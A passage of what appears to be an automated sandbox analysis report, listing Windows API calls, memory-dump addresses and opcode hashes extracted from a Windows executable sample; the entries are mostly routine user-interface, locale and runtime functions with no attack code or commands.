                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AsyncStateWindow$ChildMessageSend$FocusIconicRedrawVisible
                                                              • String ID:
                                                              • API String ID: 763474574-0
                                                              • Opcode ID: 7ebe4a6d9b876acd5df939114c039a285000e53c8a636c9cc6c9c124798bf16a
                                                              • Instruction ID: c09db54f9929086042f16769d58bab288adf648a3757a6c6399388797dae00a1
                                                              • Opcode Fuzzy Hash: 7ebe4a6d9b876acd5df939114c039a285000e53c8a636c9cc6c9c124798bf16a
                                                              • Instruction Fuzzy Hash: CF71D27AA04225BFDB209F60E884B6A7FA6FF46300F094479E985D72E1DB31DC80CB51
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000021), ref: 005231D5
                                                              • GetSystemMetrics.USER32(00000020), ref: 005231DC
                                                              • IsIconic.USER32(?), ref: 005231F0
                                                              • GetWindowRect.USER32(?,00000020), ref: 00523231
                                                              • IsIconic.USER32(?), ref: 00523255
                                                              • GetSystemMetrics.USER32(00000004), ref: 00523261
                                                              • OffsetRect.USER32(00000020,?,?), ref: 00523273
                                                              • GetSystemMetrics.USER32(00000004), ref: 0052327B
                                                              • IsIconic.USER32(?), ref: 005232A9
                                                              • GetSystemMetrics.USER32(00000021), ref: 005232B5
                                                              • GetSystemMetrics.USER32(00000020), ref: 005232BC
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$Iconic$RectWindow$LongOffset
                                                              • String ID:
                                                              • API String ID: 993849457-0
                                                              • Opcode ID: 04433efb68d80878146e7919c1788309e4848572c6a8384413e740de132faa55
                                                              • Instruction ID: 07d52d08408e36808cd2e1470bb258ffe13139341c7af1c1b9d6cdc9435fc7d9
                                                              • Opcode Fuzzy Hash: 04433efb68d80878146e7919c1788309e4848572c6a8384413e740de132faa55
                                                              • Instruction Fuzzy Hash: 9641F571A002199FCB04DFA9D885BBEBBF5FF58300F04446AEA09EB251DB34A940CF64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientScreenWindow_free_memset
                                                              • String ID: 0
                                                              • API String ID: 2869304798-4108050209
                                                              • Opcode ID: c3cc301c7b9057fe52aa51396a4209dd06a01590bc80d547842eaa3951ced776
                                                              • Instruction ID: 4fe0f29815a890aff71851d2c906ad0cf209e063aafb309ce226807baeb69b59
                                                              • Opcode Fuzzy Hash: c3cc301c7b9057fe52aa51396a4209dd06a01590bc80d547842eaa3951ced776
                                                              • Instruction Fuzzy Hash: F4519330A022059FEB229FA5D988BEDBFB5FF44310F10412AE851E6291DB759CC1CB42
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 005234D9
                                                              • ScreenToClient.USER32(?,?), ref: 00523557
                                                              • GetSystemMetrics.USER32(00000021), ref: 00523565
                                                              • GetSystemMetrics.USER32(00000020), ref: 0052356E
                                                              • IsIconic.USER32(?), ref: 0052357C
                                                              • GetSystemMetrics.USER32(00000004), ref: 00523588
                                                              • PtInRect.USER32(00000000,?,?), ref: 005235CF
                                                              • PtInRect.USER32(?,?,?), ref: 005235F8
                                                              • GetSystemMetrics.USER32(00000004), ref: 0052360E
                                                              • PtInRect.USER32(00000020,?,?), ref: 00523626
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$Rect$ClientIconicScreenVisibleWindow
                                                              • String ID:
                                                              • API String ID: 1122842830-0
                                                              • Opcode ID: f179ce4009b873dc0c1e571a63a4586aaf6c7f6a8f7961e59bebfd8db01d9434
                                                              • Instruction ID: 3f57e213065ddcb5b1132fa7cbfad1277ab22ef76d6ac56bebb13709fe55048b
                                                              • Opcode Fuzzy Hash: f179ce4009b873dc0c1e571a63a4586aaf6c7f6a8f7961e59bebfd8db01d9434
                                                              • Instruction Fuzzy Hash: CA517F31A0021AAFCF14DF64E880AADBBB5FF49710F144069E909E7290DB39EE15DB90
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004ED5F7
                                                              • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000268,004ED7D2,?,?,00000000), ref: 004ED635
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • PathIsUNCW.SHLWAPI(?,00000000), ref: 004ED6B1
                                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004ED6D8
                                                              • CharUpperW.USER32(?), ref: 004ED70B
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004ED727
                                                              • FindClose.KERNEL32(00000000), ref: 004ED733
                                                              • lstrlenW.KERNEL32(?), ref: 004ED751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                                              • String ID:
                                                              • API String ID: 624941980-0
                                                              • Opcode ID: 0dfc4b019a25c6e73ac11efa810c765ce81426c3e8e2063bada4a8280820ce8c
                                                              • Instruction ID: 88810eb64201e299a0737a9cfefd7adad168818e3d07cc78ee1fe49f371403e2
                                                              • Opcode Fuzzy Hash: 0dfc4b019a25c6e73ac11efa810c765ce81426c3e8e2063bada4a8280820ce8c
                                                              • Instruction Fuzzy Hash: FE41D370D042159BDF24AB72CC9DBBE7679AF10319F14069EB81A92291DF398E84CF14
                                                              APIs
                                                                • Part of subcall function 004E1231: __EH_prolog3_catch.LIBCMT ref: 004E1238
                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,00000005,005C8686,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C86ED
                                                              • FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C872B
                                                              • FindResourceW.KERNEL32(00000000,?,00000005,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8744
                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8752
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000005,005C8686,00000000,?,?,005A78C4,00000000,?,005A7C5F,00000000,0000001C,005A79F2,00000000,005A7C5F), ref: 005C8782
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Resource$Find$AllocDefaultException@8GlobalH_prolog3H_prolog3_catchLanguageLoadThrowUser
                                                              • String ID: MS UI Gothic
                                                              • API String ID: 2010067809-1905310704
                                                              • Opcode ID: ae569c4a907f9086847241c9501483311645dbb0f299572fefd1a90de00caf42
                                                              • Instruction ID: 29ae7d79a12bdf2380afe2e85cf135ec63707f463598870a8c2265c76d4d8a21
                                                              • Opcode Fuzzy Hash: ae569c4a907f9086847241c9501483311645dbb0f299572fefd1a90de00caf42
                                                              • Instruction Fuzzy Hash: 95310475600202AFDB10AFA6CC5AE7A7BA9FF50714B14802EFD05DB2A1EF35DC41DA64
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 0054214E
                                                              • SetRectEmpty.USER32(?), ref: 00542157
                                                              • InflateRect.USER32(?), ref: 00542239
                                                                • Part of subcall function 0054107C: __EH_prolog3_GS.LIBCMT ref: 00541086
                                                                • Part of subcall function 0054107C: InflateRect.USER32(000000FE,000000FD,00000000), ref: 005410F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$EmptyInflate$H_prolog3_
                                                              • String ID:
                                                              • API String ID: 3226488205-0
                                                              • Opcode ID: f3177cede798ddf2c173c5ca8eaccd45b67e352a3b1e01f4a13845e39418aa71
                                                              • Instruction ID: d3e76fcd399a3127257e1c4d61f51398dffe5b7e47a377e7dbc6c804c482f551
                                                              • Opcode Fuzzy Hash: f3177cede798ddf2c173c5ca8eaccd45b67e352a3b1e01f4a13845e39418aa71
                                                              • Instruction Fuzzy Hash: B4D17971900628DFCF16CF68C884AEEBBB2FF89318F544269FC09AB145DB319845CB60
                                                              APIs
                                                                • Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23
                                                              • GetClientRect.USER32(?,?), ref: 00520674
                                                              • GetAsyncKeyState.USER32(00000011), ref: 0052071A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AsyncClientLongRectStateWindow
                                                              • String ID: '
                                                              • API String ID: 304971295-1997036262
                                                              • Opcode ID: 643f7e32e3047942e1ee9323407c3fa0f8356a2b8f4aa06ce43fe001a74bd2ac
                                                              • Instruction ID: f858155a13cfdb23fdfb471eb65b9752de608ddb36b8b484ec6966b3989d3453
                                                              • Opcode Fuzzy Hash: 643f7e32e3047942e1ee9323407c3fa0f8356a2b8f4aa06ce43fe001a74bd2ac
                                                              • Instruction Fuzzy Hash: 31B17E317026269BDB299F64D498BBE7FE2BF86300F14152DE506DB2D2DB749D80CB81
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000,00000000), ref: 005E231E
                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000,00000000), ref: 005E2347
                                                              • GetACP.KERNEL32(?,?,005E291C,?,005D6683,?,000000BC,?,00000001,00000000), ref: 005E235B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 227e5cc90e3c6f2bb706ed05a8449d72f8578af70139fa477ff2e8cdfc19dddf
                                                              • Instruction ID: 20128853783f77366ef80436fab7080a034430512b4942d3b8048e282b72847b
                                                              • Opcode Fuzzy Hash: 227e5cc90e3c6f2bb706ed05a8449d72f8578af70139fa477ff2e8cdfc19dddf
                                                              • Instruction Fuzzy Hash: 87014C3120074BFAEF198B5AEC09F6E3EADBF18319F204815F081E1088EB78DA41DE50
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 005D3B2F
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005D3B44
                                                              • UnhandledExceptionFilter.KERNEL32(0061DB00), ref: 005D3B4F
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 005D3B6B
                                                              • TerminateProcess.KERNEL32(00000000), ref: 005D3B72
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID:
                                                              • API String ID: 2579439406-0
                                                              • Opcode ID: fec23e0e27c2bdd4891b56ea69a5bee60a8f069669dbbf3ec0dad7a52bf1f877
                                                              • Instruction ID: 5eac22e6a7ff2eb117d59e0e74bad63c6c73030334fcf9dc224e255c3dc651c6
                                                              • Opcode Fuzzy Hash: fec23e0e27c2bdd4891b56ea69a5bee60a8f069669dbbf3ec0dad7a52bf1f877
                                                              • Instruction Fuzzy Hash: BA21DFBC8413049FD780EF18FCA465C3BE6FB5A354F60611AE4088BB61EBB45980CF41
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000800,00000003,00000800,00000004), ref: 004D8F54
                                                              • __snwprintf_s.LIBCMT ref: 004D8F8F
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004D8FDA
                                                                • Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                                              • String ID: LOC
                                                              • API String ID: 3175857669-519433814
                                                              • Opcode ID: 0407c25d333ad6e0de1e333b0666a9efb2867457421cd5e252f77acb2e330033
                                                              • Instruction ID: 00d3fc08e99a89ae01c15d80f0970d73eaa4f5d69410ae9c8fd6cb39bfc827b5
                                                              • Opcode Fuzzy Hash: 0407c25d333ad6e0de1e333b0666a9efb2867457421cd5e252f77acb2e330033
                                                              • Instruction Fuzzy Hash: A521B331901219AFDB11BBA4DC5AFBE7BA9BF90714F10009FB105AB281DF786A40CB55
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,004DB85B,?,?,?,?,?,00000000,00000000), ref: 004DB412
                                                              • GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 004DB422
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: FindFirstFileTransactedW$kernel32.dll
                                                              • API String ID: 1646373207-2878570079
                                                              • Opcode ID: 602cd9dd4f4e97ed58eab11cad6faa9a978506de50bbc2086a66c848f49e9bab
                                                              • Instruction ID: d2c840b9c74db4314549c9309e064b1687085cdc58f404cb608ae91befb3fc92
                                                              • Opcode Fuzzy Hash: 602cd9dd4f4e97ed58eab11cad6faa9a978506de50bbc2086a66c848f49e9bab
                                                              • Instruction Fuzzy Hash: 1BF0A732200604F78B315F5AAC18C7BBF6AFBD1F72325852BF165C1261CB7948A1DAA5
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0052A508
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • IsIconic.USER32(?), ref: 0052A531
                                                              • GetParent.USER32(?), ref: 0052A53E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent$Exception@8H_prolog3IconicThrow
                                                              • String ID:
                                                              • API String ID: 144390861-0
                                                              • Opcode ID: 7f480d94de24477ac8fdefad8069249f9560c46fcf576f2f93a6a882db6f0241
                                                              • Instruction ID: 1572b50bd4304b1b746528fa81e6695b11f64c8f1cbe31557875c1c979d45e2e
                                                              • Opcode Fuzzy Hash: 7f480d94de24477ac8fdefad8069249f9560c46fcf576f2f93a6a882db6f0241
                                                              • Instruction Fuzzy Hash: 38F06232340225ABDF216A73BC04A2B7E5AFFA53A9B11442BF909D3551EE34DC149A92
                                                              APIs
                                                              • GetKeyState.USER32(00000010), ref: 00522100
                                                              • GetKeyState.USER32(00000011), ref: 00522109
                                                              • GetKeyState.USER32(00000012), ref: 00522112
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: State
                                                              • String ID:
                                                              • API String ID: 1649606143-0
                                                              • Opcode ID: 6ce6db1b04d7ca53df69b17349780c4cd27925f4f23e7b1baa4c678a35019cbd
                                                              • Instruction ID: 4d087e54a700503121ea75321121eb27529bcb14ac930569210a40c5a40e6e5d
                                                              • Opcode Fuzzy Hash: 6ce6db1b04d7ca53df69b17349780c4cd27925f4f23e7b1baa4c678a35019cbd
                                                              • Instruction Fuzzy Hash: BEF0E53920037DBBDB1062D1AD02FB07E55AF12780F148061EB44B70C5CAF0E961E6B0
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00524657
                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 005246A7
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
